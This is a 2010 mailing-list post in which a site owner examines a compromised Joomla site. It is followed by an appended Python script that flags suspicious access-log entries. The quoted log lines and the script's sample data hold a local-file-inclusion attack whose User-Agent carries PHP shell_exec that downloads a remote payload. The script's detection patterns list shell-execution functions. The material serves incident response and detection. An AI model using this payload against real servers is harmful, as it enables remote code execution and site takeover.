[thelist] block phishing
Bob Meetin
bobm at dottedi.biz
Sun Mar 28 11:20:15 CDT 2010
I got a notice that one of my sites got hit yesterday, so I logged in,
and identified the file mentioned, also found a couple php files that
got dropped into webhome that were related. I moved the files into an
out-of-webroot folder for future scrutinization, then checked the server
access log, found a number of entries at the approximate date stamp of
the uploaded files that seemed to be related.
I am methodically going through the system looking for anything not
locked down. What I could use some help with is understanding if the
access log entries are associated and how to lock out the intruders. As
IP addresses change I suspect it's more than simply editing the
robots.txt or adding a line in the .htaccess. Some of the suspicious
entries look like:
123.125.66.72 - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200 18076 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
83.229.80.30 - - [27/Mar/2010:18:58:41 -0500] "POST /fat.php HTTP/1.1" 200 8015 "http://www.$websitename/fat.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
fat.php was one of the deposited files. 18:58 was the datestamp.
75.125.130.100 - - [27/Mar/2010:22:25:47 -0500] "GET /administrator/host.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
Related? There is nothing (current) in the filesystem called host.php.
80.246.53.20 - - [27/Mar/2010:22:25:41 -0500] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00%0F HTTP/1.1" 200 1423 "-" "<? shell_exec('lwp-download http://immortal-killaz.servercamp.de/fanatix/tv.txt;mv tv.txt print_out.php');?>"
com_sectionex is a Joomla component. There is also no legitimate file
called print_out.php, but I found one.
75.125.130.100 - - [27/Mar/2010:22:25:48 -0500] "GET /administrator/hr57.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
Suggestions for robots.txt:

#Baiduspider
User-agent: Baiduspider
Disallow: /

#Others
User-agent: *
Disallow: /
Suggestions for .htaccess:

<Files *.*>
order allow,deny
allow from all
deny from 220.181.
</Files>
-Bob
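As an added example (not part of Bob's post or the list's own material), the following Python script parses Apache combined-format access log lines and flags the shapes seen in the entries above: directory traversal and null bytes in the request path, PHP code carried in the User-Agent or Referer (with the /proc/self/environ trick, the request's own environment, User-Agent included, is what gets included and executed, so that header is where the code arrives), and any request for one of the dropped file names. The log lines are constructed for the example: the IPs, the hostname and the payload URL are placeholders, and the file names come from the post. A robots.txt Disallow is advisory and only honoured by cooperating crawlers, so a script like this, run over the real log, is the useful first step for deciding which addresses and requests actually belong to the compromise.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample entries modelled on the shapes in the post; addresses,
# hostname and payload URL are placeholders, not the real log.
SAMPLE_LOG = r'''
198.51.100.10 - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200 18076 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
198.51.100.20 - - [27/Mar/2010:18:58:41 -0500] "POST /fat.php HTTP/1.1" 200 8015 "http://www.example.test/fat.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2"
198.51.100.30 - - [27/Mar/2010:22:25:41 -0500] "GET /index.php?option=com_sectionex&controller=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1423 "-" "<? shell_exec('lwp-download http://attacker.invalid/x.txt;mv x.txt print_out.php');?>"
198.51.100.40 - - [27/Mar/2010:22:25:47 -0500] "GET /administrator/host.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
198.51.100.50 - - [27/Mar/2010:22:26:00 -0500] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''

# Apache "combined" format. Referer and User-Agent may contain escaped quotes
# (the post's "\"Mozilla/4.0" entry), so those fields allow backslash escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# File names Bob reported as dropped or requested; adjust to the real findings.
DROPPED_FILES = {"fat.php", "print_out.php", "host.php", "hr57.php"}

PHP_CALL_RE = re.compile(r'\b(shell_exec|system|passthru|exec|eval)\s*\(')


def parse_line(raw):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(raw.strip())
    return m.groupdict() if m else None


def classify(entry):
    """List the reasons an entry looks related to the compromise (empty = benign)."""
    reasons = []
    path = unquote(entry["path"])  # decode %2e%2e, %00 and friends before matching
    if "../" in path or "/proc/self/environ" in path:
        reasons.append("path traversal / LFI attempt")
    if "\x00" in path:
        reasons.append("null byte in request")
    for field in ("ua", "referer"):
        if "<?" in entry[field] or PHP_CALL_RE.search(entry[field]):
            reasons.append(f"php code in {field}")
    basename = path.split("?", 1)[0].rsplit("/", 1)[-1]
    if basename in DROPPED_FILES:
        reasons.append(f"request for dropped file {basename}")
    return reasons


def analyze(log_text):
    """Parse every line and keep only the flagged entries, in log order."""
    findings = []
    for raw in log_text.strip().splitlines():
        entry = parse_line(raw)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "path": entry["path"], "reasons": reasons})
    return findings


def suspect_ips(findings):
    """Group the reasons by source address, the input for any deny list."""
    by_ip = defaultdict(list)
    for f in findings:
        by_ip[f["ip"]].extend(f["reasons"])
    return dict(by_ip)


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["path"][:60], "->", "; ".join(f["reasons"]))
    print("suspect addresses:", sorted(suspect_ips(analyze(SAMPLE_LOG))))
```

Run against the live access log with `analyze(open("access_log").read())`; the Baiduspider entry and the ordinary article request are left alone, while the POST to fat.php, the traversal request carrying PHP in its User-Agent, and the hit on administrator/host.php are the ones reported. Decoding the path before matching matters because the traversal in the post is partly URL-encoded; a check on the raw string would miss variants that encode the dots or slashes.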
More information about the thelist mailing list